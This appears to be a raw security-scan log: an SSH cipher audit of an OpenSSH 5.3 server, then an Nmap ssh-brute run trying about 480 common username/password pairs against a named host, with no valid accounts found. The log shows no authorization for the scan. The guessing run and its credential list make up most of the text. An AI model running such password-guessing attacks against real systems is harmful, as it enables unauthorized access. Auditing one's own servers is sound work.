- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 22:36 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: guest:iloveu
- NSE: [ssh-brute] Trying username/password pair: user:iloveu
- NSE: [ssh-brute] Trying username/password pair: web:iloveu
- NSE: [ssh-brute] Trying username/password pair: test:iloveu
- NSE: [ssh-brute] Trying username/password pair: root:michelle
- NSE: [ssh-brute] Trying username/password pair: admin:michelle
- NSE: [ssh-brute] Trying username/password pair: administrator:michelle
- NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: guest:michelle
- NSE: [ssh-brute] Trying username/password pair: user:michelle
- NSE: [ssh-brute] Trying username/password pair: web:michelle
- NSE: [ssh-brute] Trying username/password pair: test:michelle
- NSE: [ssh-brute] Trying username/password pair: root:tigger
- NSE: [ssh-brute] Trying username/password pair: admin:tigger
- NSE: [ssh-brute] Trying username/password pair: administrator:tigger
- NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: guest:tigger
- NSE: [ssh-brute] Trying username/password pair: user:tigger
- NSE: [ssh-brute] Trying username/password pair: web:tigger
- NSE: [ssh-brute] Trying username/password pair: test:tigger
- NSE: [ssh-brute] Trying username/password pair: root:sunshine
- NSE: [ssh-brute] Trying username/password pair: admin:sunshine
- NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
- NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: guest:sunshine
- NSE: [ssh-brute] Trying username/password pair: user:sunshine
- NSE: [ssh-brute] Trying username/password pair: web:sunshine
- NSE: [ssh-brute] Trying username/password pair: test:sunshine
- NSE: [ssh-brute] Trying username/password pair: root:chocolate
- NSE: [ssh-brute] Trying username/password pair: admin:chocolate
- NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
- NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: guest:chocolate
- NSE: [ssh-brute] Trying username/password pair: user:chocolate
- NSE: [ssh-brute] Trying username/password pair: web:chocolate
- NSE: [ssh-brute] Trying username/password pair: test:chocolate
- NSE: [ssh-brute] Trying username/password pair: root:password1
- NSE: [ssh-brute] Trying username/password pair: admin:password1
- NSE: [ssh-brute] Trying username/password pair: administrator:password1
- NSE: [ssh-brute] Trying username/password pair: webadmin:password1
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
- NSE: [ssh-brute] Trying username/password pair: netadmin:password1
- NSE: [ssh-brute] Trying username/password pair: guest:password1
- NSE: [ssh-brute] Trying username/password pair: user:password1
- NSE: [ssh-brute] Trying username/password pair: web:password1
- NSE: [ssh-brute] Trying username/password pair: test:password1
- NSE: [ssh-brute] Trying username/password pair: root:soccer
- NSE: [ssh-brute] Trying username/password pair: admin:soccer
- NSE: [ssh-brute] Trying username/password pair: administrator:soccer
- NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: guest:soccer
- NSE: [ssh-brute] Trying username/password pair: user:soccer
- NSE: [ssh-brute] Trying username/password pair: web:soccer
- NSE: [ssh-brute] Trying username/password pair: test:soccer
- NSE: [ssh-brute] Trying username/password pair: root:anthony
- NSE: [ssh-brute] Trying username/password pair: admin:anthony
- NSE: [ssh-brute] Trying username/password pair: administrator:anthony
- NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: guest:anthony
- NSE: [ssh-brute] Trying username/password pair: user:anthony
- NSE: [ssh-brute] Trying username/password pair: web:anthony
- NSE: [ssh-brute] Trying username/password pair: test:anthony
- NSE: [ssh-brute] Trying username/password pair: root:friends
- NSE: [ssh-brute] Trying username/password pair: admin:friends
- NSE: [ssh-brute] Trying username/password pair: administrator:friends
- NSE: [ssh-brute] Trying username/password pair: webadmin:friends
- NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
- NSE: [ssh-brute] Trying username/password pair: netadmin:friends
- NSE: [ssh-brute] Trying username/password pair: guest:friends
- NSE: [ssh-brute] Trying username/password pair: user:friends
- NSE: [ssh-brute] Trying username/password pair: web:friends
- NSE: [ssh-brute] Trying username/password pair: test:friends
- NSE: [ssh-brute] Trying username/password pair: root:purple
- NSE: [ssh-brute] Trying username/password pair: admin:purple
- NSE: [ssh-brute] Trying username/password pair: administrator:purple
- NSE: [ssh-brute] Trying username/password pair: webadmin:purple
- NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
- NSE: [ssh-brute] Trying username/password pair: netadmin:purple
- NSE: [ssh-brute] Trying username/password pair: guest:purple
- NSE: [ssh-brute] Trying username/password pair: user:purple
- NSE: [ssh-brute] Trying username/password pair: web:purple
- NSE: [ssh-brute] Trying username/password pair: test:purple
- NSE: [ssh-brute] Trying username/password pair: root:angel
- NSE: [ssh-brute] Trying username/password pair: admin:angel
- NSE: [ssh-brute] Trying username/password pair: administrator:angel
- NSE: [ssh-brute] Trying username/password pair: webadmin:angel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
- NSE: [ssh-brute] Trying username/password pair: netadmin:angel
- NSE: [ssh-brute] Trying username/password pair: guest:angel
- NSE: [ssh-brute] Trying username/password pair: user:angel
- NSE: [ssh-brute] Trying username/password pair: web:angel
- NSE: [ssh-brute] Trying username/password pair: test:angel
- NSE: [ssh-brute] Trying username/password pair: root:butterfly
- NSE: [ssh-brute] Trying username/password pair: admin:butterfly
- NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
- NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: guest:butterfly
- NSE: [ssh-brute] Trying username/password pair: user:butterfly
- NSE: [ssh-brute] Trying username/password pair: web:butterfly
- NSE: [ssh-brute] Trying username/password pair: test:butterfly
- NSE: [ssh-brute] Trying username/password pair: root:jordan
- NSE: [ssh-brute] Trying username/password pair: admin:jordan
- NSE: [ssh-brute] Trying username/password pair: administrator:jordan
- NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: guest:jordan
- NSE: [ssh-brute] Trying username/password pair: user:jordan
- NSE: [ssh-brute] Trying username/password pair: web:jordan
- NSE: [ssh-brute] Trying username/password pair: test:jordan
- NSE: [ssh-brute] Trying username/password pair: root:fuckyou
- NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
- NSE: [ssh-brute] Trying username/password pair: user:fuckyou
- NSE: [ssh-brute] Trying username/password pair: web:fuckyou
- NSE: [ssh-brute] Trying username/password pair: test:fuckyou
- NSE: [ssh-brute] Trying username/password pair: root:123123
- NSE: [ssh-brute] Trying username/password pair: admin:123123
- NSE: [ssh-brute] Trying username/password pair: administrator:123123
- NSE: [ssh-brute] Trying username/password pair: webadmin:123123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
- NSE: [ssh-brute] Trying username/password pair: netadmin:123123
- NSE: [ssh-brute] Trying username/password pair: guest:123123
- NSE: [ssh-brute] Trying username/password pair: user:123123
- NSE: [ssh-brute] Trying username/password pair: web:123123
- NSE: [ssh-brute] Trying username/password pair: test:123123
- NSE: [ssh-brute] Trying username/password pair: root:justin
- NSE: [ssh-brute] Trying username/password pair: admin:justin
- NSE: [ssh-brute] Trying username/password pair: administrator:justin
- NSE: [ssh-brute] Trying username/password pair: webadmin:justin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
- NSE: [ssh-brute] Trying username/password pair: netadmin:justin
- NSE: [ssh-brute] Trying username/password pair: guest:justin
- NSE: [ssh-brute] Trying username/password pair: user:justin
- NSE: [ssh-brute] Trying username/password pair: web:justin
- NSE: [ssh-brute] Trying username/password pair: test:justin
- NSE: [ssh-brute] Trying username/password pair: root:liverpool
- NSE: [ssh-brute] Trying username/password pair: admin:liverpool
- NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
- NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: guest:liverpool
- NSE: [ssh-brute] Trying username/password pair: user:liverpool
- NSE: [ssh-brute] Trying username/password pair: web:liverpool
- NSE: [ssh-brute] Trying username/password pair: test:liverpool
- NSE: [ssh-brute] Trying username/password pair: root:football
- NSE: [ssh-brute] Trying username/password pair: admin:football
- NSE: [ssh-brute] Trying username/password pair: administrator:football
- NSE: [ssh-brute] Trying username/password pair: webadmin:football
- NSE: [ssh-brute] Trying username/password pair: sysadmin:football
- NSE: [ssh-brute] Trying username/password pair: netadmin:football
- NSE: [ssh-brute] Trying username/password pair: guest:football
- NSE: [ssh-brute] Trying username/password pair: user:football
- NSE: [ssh-brute] Trying username/password pair: web:football
- NSE: [ssh-brute] Trying username/password pair: test:football
- NSE: [ssh-brute] Trying username/password pair: root:loveme
- NSE: [ssh-brute] Trying username/password pair: admin:loveme
- NSE: [ssh-brute] Trying username/password pair: administrator:loveme
- NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: guest:loveme
- NSE: [ssh-brute] Trying username/password pair: user:loveme
- NSE: [ssh-brute] Trying username/password pair: web:loveme
- NSE: [ssh-brute] Trying username/password pair: test:loveme
- NSE: [ssh-brute] Trying username/password pair: root:secret
- NSE: [ssh-brute] Trying username/password pair: admin:secret
- NSE: [ssh-brute] Trying username/password pair: administrator:secret
- NSE: [ssh-brute] Trying username/password pair: webadmin:secret
- NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
- NSE: [ssh-brute] Trying username/password pair: netadmin:secret
- NSE: [ssh-brute] Trying username/password pair: guest:secret
- NSE: [ssh-brute] Trying username/password pair: user:secret
- NSE: [ssh-brute] Trying username/password pair: web:secret
- NSE: [ssh-brute] Trying username/password pair: test:secret
- NSE: [ssh-brute] Trying username/password pair: root:andrea
- NSE: [ssh-brute] Trying username/password pair: admin:andrea
- NSE: [ssh-brute] Trying username/password pair: administrator:andrea
- NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: guest:andrea
- NSE: [ssh-brute] Trying username/password pair: user:andrea
- NSE: [ssh-brute] Trying username/password pair: web:andrea
- NSE: [ssh-brute] Trying username/password pair: test:andrea
- NSE: [ssh-brute] Trying username/password pair: root:jennifer
- NSE: [ssh-brute] Trying username/password pair: admin:jennifer
- NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
- NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: netadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: guest:jennifer
- NSE: [ssh-brute] Trying username/password pair: user:jennifer
- NSE: [ssh-brute] Trying username/password pair: web:jennifer
- NSE: [ssh-brute] Trying username/password pair: test:jennifer
- NSE: [ssh-brute] Trying username/password pair: root:joshua
- NSE: [ssh-brute] Trying username/password pair: admin:joshua
- NSE: [ssh-brute] Trying username/password pair: administrator:joshua
- NSE: [ssh-brute] Trying username/password pair: webadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: sysadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: netadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: guest:joshua
- NSE: [ssh-brute] Trying username/password pair: user:joshua
- NSE: [ssh-brute] Trying username/password pair: web:joshua
- NSE: [ssh-brute] Trying username/password pair: test:joshua
- NSE: [ssh-brute] Trying username/password pair: root:carlos
- NSE: [ssh-brute] Trying username/password pair: admin:carlos
- NSE: [ssh-brute] Trying username/password pair: administrator:carlos
- NSE: [ssh-brute] Trying username/password pair: webadmin:carlos
- NSE: [ssh-brute] Trying username/password pair: sysadmin:carlos
- NSE: [ssh-brute] Trying username/password pair: netadmin:carlos
- NSE: [ssh-brute] Trying username/password pair: guest:carlos
- NSE: [ssh-brute] Trying username/password pair: user:carlos
- NSE: [ssh-brute] Trying username/password pair: web:carlos
- NSE: [ssh-brute] Trying username/password pair: test:carlos
- NSE: [ssh-brute] Trying username/password pair: root:superman
- NSE: [ssh-brute] Trying username/password pair: admin:superman
- NSE: [ssh-brute] Trying username/password pair: administrator:superman
- NSE: [ssh-brute] Trying username/password pair: webadmin:superman
- NSE: [ssh-brute] Trying username/password pair: sysadmin:superman
- NSE: [ssh-brute] Trying username/password pair: netadmin:superman
- NSE: [ssh-brute] Trying username/password pair: guest:superman
- NSE: [ssh-brute] Trying username/password pair: user:superman
- NSE: [ssh-brute] Trying username/password pair: web:superman
- NSE: [ssh-brute] Trying username/password pair: test:superman
- Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
- Host is up (0.12s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- | gssapi-with-mic
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 480 guesses in 182 seconds, average tps: 2.6
- | ssh-hostkey:
- | 1024 8e:e7:56:ea:03:ad:32:fe:55:c7:ac:da:71:96:9b:f9 (DSA)
